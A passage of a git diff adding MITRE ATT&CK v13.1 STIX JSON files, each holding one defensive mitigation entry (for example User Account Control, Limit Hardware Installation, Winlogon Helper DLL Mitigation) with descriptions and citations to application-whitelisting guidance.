Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.664Z", + "name": "Application Window Discovery Mitigation", + "description": "Identify unnecessary system utilities or potentially malicious software that may be used to acquire information, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1.json new file mode 100644 index 0000000000000000000000000000000000000000..d8d64b67590d503d1b1cc2f8c08bb76d7c6b8c41 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1.json 
@@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--0c19d5f3-aa1d-4756-b827-4499d5310913", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack", + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--25dc1ce8-eb55-4333-ae30-a7cb4f5894a1", + "type": "course-of-action", + "created": "2017-10-25T14:48:53.732Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1013", + "external_id": "M1013" + } + ], + "modified": "2018-10-17T00:14:20.652Z", + "name": "Application Developer Guidance", + "description": "This mitigation describes any guidance or training given to developers of applications to avoid introducing security weaknesses that an adversary may be able to take advantage of.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--25e53928-6f33-49b7-baee-8180578286f6.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--25e53928-6f33-49b7-baee-8180578286f6.json new file mode 100644 index 0000000000000000000000000000000000000000..45443745887d81218f1e0f54fec176917ff172be --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--25e53928-6f33-49b7-baee-8180578286f6.json 
@@ -0,0 +1,37 @@ +{ + "type": "bundle", + "id": "bundle--185ac78f-77d8-4f72-8b44-72e378ac86b3", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--25e53928-6f33-49b7-baee-8180578286f6", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1019", + "external_id": "T1019" + }, + { + "source_name": "TCG Trusted Platform Module", + "description": "Trusted Computing Group. (2008, April 29). Trusted Platform Module (TPM) Summary. Retrieved June 8, 2016.", + "url": "http://www.trustedcomputinggroup.org/wp-content/uploads/Trusted-Platform-Module-Summary_04292008.pdf" + } + ], + "modified": "2019-07-25T12:06:06.231Z", + "name": "System Firmware Mitigation", + "description": "Prevent adversary access to privileged accounts or access necessary to perform this technique. Check the integrity of the existing BIOS or EFI to determine if it is vulnerable to modification. Patch the BIOS and EFI as necessary. Use Trusted Platform Module technology. (Citation: TCG Trusted Platform Module)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--28adf6fd-ab6c-4553-9aa7-cef18a191f33.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--28adf6fd-ab6c-4553-9aa7-cef18a191f33.json new file mode 100644 index 0000000000000000000000000000000000000000..13f65bfb07187a1dc1c1bfae2bc99ee64a9800a2 --- /dev/null 
+++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--28adf6fd-ab6c-4553-9aa7-cef18a191f33.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--a56bff3e-091f-4662-8287-01f8656d02bf", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--28adf6fd-ab6c-4553-9aa7-cef18a191f33", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1002", + "url": "https://attack.mitre.org/mitigations/T1002", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.683Z", + "name": "Data Compressed Mitigation", + "description": "Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to compress files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)\n\nIf network intrusion prevention or data loss prevention tools are set to block specific file types from leaving the network over unencrypted channels, then an adversary may move to an encrypted channel.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2995bc22-2851-4345-ad19-4e7e295be264.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2995bc22-2851-4345-ad19-4e7e295be264.json new file mode 100644 index 0000000000000000000000000000000000000000..336216376aee460c72ae3d2862ff1e77b004bbd2 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2995bc22-2851-4345-ad19-4e7e295be264.json 
@@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--dbed4b1b-ad0c-4eba-b6f8-66053bb530ea", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--2995bc22-2851-4345-ad19-4e7e295be264", + "type": "course-of-action", + "created": "2019-06-11T16:28:41.809Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1034", + "url": "https://attack.mitre.org/mitigations/M1034" + } + ], + "modified": "2020-06-09T20:48:12.326Z", + "name": "Limit Hardware Installation", + "description": "Block users or groups from installing or using unapproved hardware on systems, including USB devices.", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2a8de25c-f743-4348-b101-3ee33ab5871b.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2a8de25c-f743-4348-b101-3ee33ab5871b.json new file mode 100644 index 0000000000000000000000000000000000000000..4e1d8765c6e19551343ffe7196bb003ac97af15b --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2a8de25c-f743-4348-b101-3ee33ab5871b.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--f62b461d-7b62-4e6a-beb7-912bdfd1a0b4", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--2a8de25c-f743-4348-b101-3ee33ab5871b", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1022", + "url": "https://attack.mitre.org/mitigations/T1022", + "source_name": "mitre-attack" + }, + { + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "source_name": "Beechey 2010" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "source_name": "Corio 2008" + }, + { + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "source_name": "TechNet Applocker vs SRP" + } + ], + "modified": "2021-08-23T20:25:19.310Z", + "name": "Data Encrypted Mitigation", + "description": "Identify unnecessary system utilities, third-party tools, or potentially malicious software that may be used to encrypt files, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2ace01f8-67c8-43eb-b7b1-a7b9f1fe67e1.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2ace01f8-67c8-43eb-b7b1-a7b9f1fe67e1.json new file mode 100644 index 0000000000000000000000000000000000000000..6a650d3d29c414be16053893245faed32500a3f9 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2ace01f8-67c8-43eb-b7b1-a7b9f1fe67e1.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--66c16181-7ca0-4f8f-b444-eaba86636777", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--2ace01f8-67c8-43eb-b7b1-a7b9f1fe67e1", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1083", + "url": "https://attack.mitre.org/mitigations/T1083", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.120Z", + "name": "File and Directory Discovery Mitigation", + "description": "File system activity is a common part of an operating system, so it is unlikely that mitigation would be appropriate for this technique. It may still be beneficial to identify and block unnecessary system utilities or potentially malicious software by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2c2ad92a-d710-41ab-a996-1db143bb4808.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2c2ad92a-d710-41ab-a996-1db143bb4808.json new file mode 100644 index 0000000000000000000000000000000000000000..a47068b2e1ea5ce0a7154502c2fdb1e3971bbc10 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2c2ad92a-d710-41ab-a996-1db143bb4808.json 
@@ -0,0 +1,31 @@ +{ + "type": "bundle", + "id": "bundle--696b931c-f211-4869-9eed-fe5ce492bcf3", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--2c2ad92a-d710-41ab-a996-1db143bb4808", + "type": "course-of-action", + "created": "2019-06-11T17:14:35.170Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "M1052", + "url": "https://attack.mitre.org/mitigations/M1052" + } + ], + "modified": "2020-03-31T13:49:49.636Z", + "name": "User Account Control", + "description": "Configure Windows User Account Control to mitigate risk of adversaries obtaining elevated process access.", + "x_mitre_version": "1.1", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2c3ce852-06a2-40ee-8fe6-086f6402a739.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2c3ce852-06a2-40ee-8fe6-086f6402a739.json new file mode 100644 index 0000000000000000000000000000000000000000..a6d3ed9962994759497fd7530f85b13a71164b3a --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2c3ce852-06a2-40ee-8fe6-086f6402a739.json 
@@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--3aa4a96c-05af-4e94-8867-7026f210c20c", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--2c3ce852-06a2-40ee-8fe6-086f6402a739", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1062", + "external_id": "T1062" + } + ], + "modified": "2019-07-24T19:37:57.004Z", + "name": "Hypervisor Mitigation", + "description": "Prevent adversary access to privileged accounts necessary to install a hypervisor.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2d704e56-e689-4011-b989-bf4e025a8727.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2d704e56-e689-4011-b989-bf4e025a8727.json new file mode 100644 index 0000000000000000000000000000000000000000..1c782fae900358f1c84f45d1ad73780e9f944434 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2d704e56-e689-4011-b989-bf4e025a8727.json 
@@ -0,0 +1,32 @@ +{ + "type": "bundle", + "id": "bundle--a4c8714e-d792-40ce-b3c1-84ab7fd749e9", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--2d704e56-e689-4011-b989-bf4e025a8727", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/T1150", + "external_id": "T1150" + } + ], + "modified": "2019-07-25T11:25:29.091Z", + "name": "Plist Modification Mitigation", + "description": "Prevent plist files from being modified by users by making them read-only.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3.json new file mode 100644 index 0000000000000000000000000000000000000000..bb4fddb65bd9a97efe34d881e5732a8d2e8c068f --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3.json 
@@ -0,0 +1,34 @@ +{ + "type": "bundle", + "id": "bundle--53c53bb1-fb6e-423a-ab76-e5403fa95a59", + "spec_version": "2.0", + "objects": [ + { + "modified": "2023-03-31T17:27:28.395Z", + "name": "Operating System Configuration", + "description": "Make configuration changes related to the operating system or a common feature of the operating system that result in system hardening against techniques.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_version": "1.2", + "type": "course-of-action", + "id": "course-of-action--2f316f6c-ae42-44fe-adf8-150989e0f6d3", + "created": "2019-06-06T21:16:18.709Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/mitigations/M1028", + "external_id": "M1028" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--308855d1-078b-47ad-8d2a-8f9b2713ffb5.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--308855d1-078b-47ad-8d2a-8f9b2713ffb5.json new file mode 100644 index 0000000000000000000000000000000000000000..9c5b39cebac3fff1d0e72796d7ae1a42fbb28483 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--308855d1-078b-47ad-8d2a-8f9b2713ffb5.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--3ce257af-63d4-41d5-a4f5-8556f222bdb7", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--308855d1-078b-47ad-8d2a-8f9b2713ffb5", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1077", + "url": "https://attack.mitre.org/mitigations/T1077", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
Retrieved April 7, 2016.", + "url": "https://technet.microsoft.com/en-us/library/ee791851.aspx" + } + ], + "modified": "2020-01-17T16:45:23.710Z", + "name": "Windows Admin Shares Mitigation", + "description": "Do not reuse local administrator account passwords across systems. Ensure password complexity and uniqueness such that the passwords cannot be cracked or guessed. Deny remote use of local admin credentials to log into systems. Do not allow domain user accounts to be in the local Administrators group multiple systems.\n\nIdentify unnecessary system utilities or potentially malicious software that may be used to leverage SMB and the Windows admin shares, and audit and/or block them by using whitelisting (Citation: Beechey 2010) tools, like AppLocker, (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) or Software Restriction Policies (Citation: Corio 2008) where appropriate. (Citation: TechNet Applocker vs SRP)", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--313c8b20-4d49-40c1-9ac0-4c573aca28f3.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--313c8b20-4d49-40c1-9ac0-4c573aca28f3.json new file mode 100644 index 0000000000000000000000000000000000000000..529413120a54cff6171da600dec6aae0d935698d --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--313c8b20-4d49-40c1-9ac0-4c573aca28f3.json 
@@ -0,0 +1,47 @@ +{ + "type": "bundle", + "id": "bundle--0f691191-9623-46a7-8dc7-0e3ddcb71dcb", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--313c8b20-4d49-40c1-9ac0-4c573aca28f3", + "type": "course-of-action", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "external_id": "T1004", + "url": "https://attack.mitre.org/mitigations/T1004", + "source_name": "mitre-attack" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "http://blog.jpcert.or.jp/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. 
Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + } + ], + "modified": "2020-01-17T16:45:24.244Z", + "name": "Winlogon Helper DLL Mitigation", + "description": "Limit the privileges of user accounts so that only authorized administrators can perform Winlogon helper changes.\n\nIdentify and block potentially malicious software that may be executed through the Winlogon helper process by using whitelisting (Citation: Beechey 2010) tools like AppLocker (Citation: Windows Commands JPCERT) (Citation: NSA MS AppLocker) that are capable of auditing and/or blocking unknown DLLs.", + "x_mitre_deprecated": true, + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + } + ] +} \ No newline at end of file diff --git a/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--337172b1-b003-4034-8a3f-1d89a71da628.json b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--337172b1-b003-4034-8a3f-1d89a71da628.json new file mode 100644 index 0000000000000000000000000000000000000000..757e953c4214af9b76a68dbfd1a3098e973b4877 --- /dev/null +++ b/cti-ATT-CK-v13.1/enterprise-attack/course-of-action/course-of-action--337172b1-b003-4034-8a3f-1d89a71da628.json 
@@ -0,0 +1,57 @@ +{ + "type": "bundle", + "id": "bundle--69f68d70-643f-4d40-9575-a4635b6ef692", + "spec_version": "2.0", + "objects": [ + { + "x_mitre_domains": [ + "enterprise-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "course-of-action--337172b1-b003-4034-8a3f-1d89a71da628", + "type": "course-of-action", + "created": "2019-04-12T14:59:36.522Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "url": "https://attack.mitre.org/mitigations/T1494", + "source_name": "mitre-attack", + "external_id": "T1494" + }, + { + "source_name": "Beechey 2010", + "description": "Beechey, J. (2010, December). Application Whitelisting: Panacea or Propaganda?. Retrieved November 18, 2014.", + "url": "http://www.sans.org/reading-room/whitepapers/application/application-whitelisting-panacea-propaganda-33599" + }, + { + "url": "https://blogs.jpcert.or.jp/en/2016/01/windows-commands-abused-by-attackers.html", + "description": "Tomonaga, S. (2016, January 26). Windows Commands Abused by Attackers. Retrieved February 2, 2016.", + "source_name": "Windows Commands JPCERT" + }, + { + "url": "https://apps.nsa.gov/iaarchive/library/ia-guidance/tech-briefs/application-whitelisting-using-microsoft-applocker.cfm", + "description": "NSA Information Assurance Directorate. (2014, August). Application Whitelisting Using Microsoft AppLocker. Retrieved March 31, 2016.", + "source_name": "NSA MS AppLocker" + }, + { + "source_name": "Corio 2008", + "description": "Corio, C., & Sayana, D. P. (2008, June). Application Lockdown with Software Restriction Policies. Retrieved November 18, 2014.", + "url": "http://technet.microsoft.com/en-us/magazine/2008.06.srp.aspx" + }, + { + "source_name": "TechNet Applocker vs SRP", + "description": "Microsoft. (2012, June 27). Using Software Restriction Policies and AppLocker Policies. 
